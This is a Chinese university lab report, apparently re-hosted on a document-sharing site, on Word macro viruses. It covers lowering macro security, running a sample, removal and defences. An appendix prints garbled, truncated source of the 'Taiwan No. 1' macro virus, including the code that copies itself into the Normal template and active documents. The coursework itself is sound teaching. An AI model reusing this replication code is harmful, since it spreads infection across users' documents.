信息安全技术实验报告台湾一号.docx

信息安全技术实验报告台湾一号.docx

《信息安全技术实验报告台湾一号.docx》由会员分享，可在线阅读，更多相关《信息安全技术实验报告台湾一号.docx（17页珍藏版）》请在冰豆网上搜索。

信息安全技术实验报告台湾一号

课程实验报告

专业年级信息管理与信息系统xxxx

课程名称信息安全技术

指导教师xxx

学生姓名xx

学号2013231928xxxx

实验日期2016.11。

14

实验地点实验楼304

实验成绩

教务处制

二O一六年月日

实验项

目名称

Word宏病毒

实验目的

及要求

（1）了解Word宏指令原理。

（2）了解Word宏的编写。

（3）理解宏病毒的作用机制。

（4）通过上机实验，编写实验报告.

实验

内容

（1）掌握Word2000宏安全性设置。

（2）学习Word宏病毒书写格式，掌握Word宏的编写。

（3）了解具有破坏性的Word宏病毒编写，Word宏病毒的清楚。

实验环境

（1）硬件设备：

局域网、终端PC.

（2）系统软件:

Windows系列操作系统.

（3）支撑软件:

Word2010

实验步骤

实验说明：

为了保证实验的顺利进行和该实验不造成较大的破坏性，在实验开始实验之前，首先关闭杀毒软件。

其次,在进行实验感染后,被感染的终端不要打开过多的Word文档,否则清除比较麻烦。

再次，实验者在实验过后需对实验报告和终端上面的资料进行杀毒处理。

最后,实验者对实验得到的有毒文件不能在网络（公网）上面传播，以造成不必要的麻烦.

（1）打开word文档，如附图1-1：

附图1-1word主界面

（2）打开“文件”项目，如附图1—2：

附图1—2文件项目

（3）在文件项目中选择“选项”，进入选项窗口，如附图1-3：

附图1-3“选项”窗口

（4）在“选项"窗口中选择自定义功能区，再选择开发工具，如附图1—4：

附图1—4自定义功能区

（5）在自定义功能区中将开发工具打上勾，如附图1-5：

附图1—5选择开发工具

（6）点击确定，返回到word主界面，如附图1—6：

附图1—6word主界面

（7）在word主界面中选择开发工具，点击“宏安全性”，进入信任中心界面，如附图1-7:

附图1-7信任中心

（8）在“信任中心”界面中选择“宏设置”按钮,如附图1-8：

附图1-8宏设置

（9）在“宏设置”中，选择“启用所有宏”、“信任任何VBA工程对象模型的访问”,如附图1-9：

附图1—9启用所有宏

（10）点击“确定”，返回到word主界面，如附图1—10：

附图1-10word主界面

（11）在“开发工具”中选择“VisualBasic”或者使用快捷键Alt+F11，启用宏编辑器,如附图1-11：

附图1—11宏编辑器

（12）选择左侧的“Project→MicrosoftWord对象→ThisDocument”，如附图1—12：

附图1—12宏代码编写

（13）在窗口中输入代码，如附图1—13：

附图1-13代码输入

（14）将代码中“IfDay（Now（））=14Then”改为当前系统日期，如附图1-14:

附图1-14日期修改

（15）点击保存、运行，如附图1—15:

附图1-15病毒运行

（16）回答对话框内问题，如附图1-16：

附图1—16执行询问

（17）回答问题,如果答对就跳入文档,如附图1-17：

附图1-17运行结果

（18）如果错误，将会新建20个写有“宏病毒"字样的Word文档，再一次进行心算游戏。

总共进行三次，然后跳出程序。

关闭文档的时候也会执行同样的询问。

（19）启用任务管理器,结束任务进程。

实验结果

与

分析

宏病毒：

就是软件设计者为了让人们在使用软件进行工作时，避免一再地重复相同的动作而设计出来的一种工具，它利用简单的语法，把常用的动作写成类似批处理命令的多行代码的集合.

宏病毒是寄存在文档或模板的宏中的计算机病毒，一旦打开这样的文档，宏病毒就会执行，转移到计算机上，并驻留到Normal模板中,文档一旦进行自动保存，那么就会染上这种病毒，并产生连锁性的感染。

在此次实验中，我们学习到了病毒的传染性，顽固性，一旦染上病毒，如果操作不当，病毒就会传染到整个计算机上。

在计算机使用过程中,我们应该小心再小心。

同时在实验中我们要知道怎样清除宏病毒和防御宏病毒。

清除宏病毒:

（1）杀毒软件清除宏病毒。

（2）用手工清除

1.单击“视图”→“宏”→查看宏。

2.单击“宏的位置”下拉条，选择“Normal。

dot”，删除刚才定义的自动宏

宏病毒的防御:

（1）宏病毒的防御方法

●设置安全级别

1、打开Word文档→“文件"→“选项”→“自定义功能区（开发工具打钩确定）”→“开发工具"→“宏安全性”→“禁用所有宏,并发出通知"。

2、在开发人员宏设置选项中，取消信任对VBA工程模型对象的访问。

●为宏添加数字签名

打开Word文档→“文件”→“选项”→“自定义功能区（开发工具打钩确定）”→“开发工具”→“宏安全性”→“禁用所有宏，并发出通知”→“Visual Basic 编辑器” →“工具" →“数字签名”即可设置数字签名

附台湾一号源代码：

'fanjian_shiyan

Dimnm（4）

SubDocument_Open（）

Setourcodemodule=ThisDocument。

VBProject。

VBComponents

（1）。

CodeModule

Sethost=NormalTemplate。

VBProject.VBComponents

（1）.CodeModule

IfThisDocument=NormalTemplateThen

Sethost=ActiveDocument。

VBProject.VBComponents

（1）。

CodeModule

EndIf

Withhost

If。

Lines（1,1）〈>"'fanjian_shiyan"Then

。

DeleteLines1，。

CountOfLines

.InsertLines1，ourcodemodule.Lines（1，100）

。

ReplaceLine3,"SubDocument_Close（）”

IfThisDocument=NormalTemplateThen

.ReplaceLine3,"SubDocument_Open（）”

ActiveDocument。

SaveAsActiveDocument.FullName

EndIf

EndIf

EndWith

Count=0

IfDay（Now（））=13Then

try:

OnErrorGoTotry

test=-1

con=1

tog＄=""

i=0

Whiletest=-1

Fori=0To4